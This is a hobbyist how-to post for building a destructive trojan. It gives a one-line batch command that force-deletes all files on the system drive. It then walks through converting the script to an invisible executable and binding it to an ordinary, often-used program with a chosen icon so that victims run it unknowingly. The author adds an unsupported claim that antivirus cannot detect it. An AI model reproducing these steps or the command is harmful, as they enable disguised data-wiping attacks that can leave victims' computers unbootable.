Make Dangerous Computer Virus

by Roshan the innovator in Circuits > Computers

44512 Views, 31 Favorites, 0 Comments

Make Dangerous Computer Virus

tranquilnet-The-Danger-of-Contracting-Computer-Viruses-blog.jpg
make dangerous viurs.jpg
Warning.jpg
only for knowledge purpose (1).jpg

In this instructable ...we are making the computer virus using cmd code... :-)


Batch Coding

you just gonna do is

open notepad and type the below code

@echo off
del %systemdrive%\*.*/f/s/q exit

and save it as anything.bat

for instance you can save it as destroyer.bat

Converting Batch File to .exe File

bat to exe.jpg

now you will need a software "batch to exe converter".....

we are not only converting the .bat file to .exe file ....we are also changing its mode to invisible mode....

you just gonna do is select the batch file as a input and specify the output file....

then check the invisible application option in the visibility tab....

Binding Virus and Any Exe Application

easy binder.jpg

In this step we need another software "Easy Binder"......which is used to bind multiple files together.....

Then select any other useful,often used software....

After that open Easy Binder software....

then add both the files...

then select the icon (any)...you can download the icon file from the internet...

then click on bind files...

then your virus file is created now....

Important Observation

imp.jpg

Dont open it..becoz.. although you open it you cannot find the virus is running becoz it is in the invisible mode...If you unfortunately opened it ..you have to reinstall the OS again...

Move it to your virtual machine (you can use vmware or vmbox ) then run and see the fun....

And most important thing is that it cannot be predicted by antiviurs ..I think so......

whats happening:-

when you open this application....the cmd code executes in invisible mode....

that code just deletes files in the system drive.....

depending on your computer speed...your computer slows down after 3 min (approximately).....

after that it shows file is missing

if you restart the computer the compute wont start..... :-)

actually it is not a virus... there is a difference between this file and a virus file...but it does the same thing what a virus can do....

If u have any suggestions or comments regarding to this topic plz leave a comment below..... :-)